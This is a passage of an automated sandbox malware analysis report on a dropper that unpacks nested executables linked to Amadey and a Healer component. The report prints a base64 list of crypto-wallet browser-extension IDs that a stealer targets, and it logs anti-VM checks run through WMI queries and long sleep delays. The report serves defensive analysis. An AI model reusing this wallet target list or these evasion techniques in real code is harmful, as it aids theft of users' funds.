24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                            Source: 6.0.b7687179.exe.e80000.0.unpack, SystemNetNetResA.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCommand line argument: Kernel32.dll0_2_00A92BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCommand line argument: Kernel32.dll1_2_00212BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCommand line argument: Kernel32.dll2_2_00BC2BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCommand line argument: P:A3_2_004139A0
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeAutomated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeAutomated click: OK
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: qu0t4ukLoN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: qu0t4ukLoN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: wextract.pdb source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: v7020033.exe, 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, v7020033.exe, 00000001.00000003.357393527.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, c6803120.exe.1.dr
                            Source: Binary string: wextract.pdbGCTL source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: a4758283.exe, 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp, a4758283.exe, 00000003.00000003.360898057.0000000000472000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.383174563.0000000004182000.00000020.00000400.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9724D push ecx; ret 0_2_00A97260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_0021724D push ecx; ret 1_2_00217260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC724D push ecx; ret 2_2_00BC7260
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040D2D9 push ecx; ret 3_2_0040D2EC
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00406D88 push ecx; ret 3_2_00406D9B
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A9202A
                            Source: b7687179.exe.2.drStatic PE information: 0x9F8A3121 [Mon Oct 26 13:24:49 2054 UTC]
                            Source: d4851931.exe.0.drStatic PE information: section name: .OuoYr
                            Source: a4758283.exe.2.drStatic PE information: section name: .miJql
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeJump to dropped file
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeJump to dropped file
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A91AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00A91AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00211AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00211AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00BC1AE8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe TID: 3952Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe TID: 4184Thread sleep count: 1813 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe TID: 2104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWindow / User API: threadDelayed 1813Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2451
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2450
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: b7687179.exe, 00000006.00000003.422596878.00000000015B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                            Source: b7687179.exe, 00000006.00000003.422596878.00000000015BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
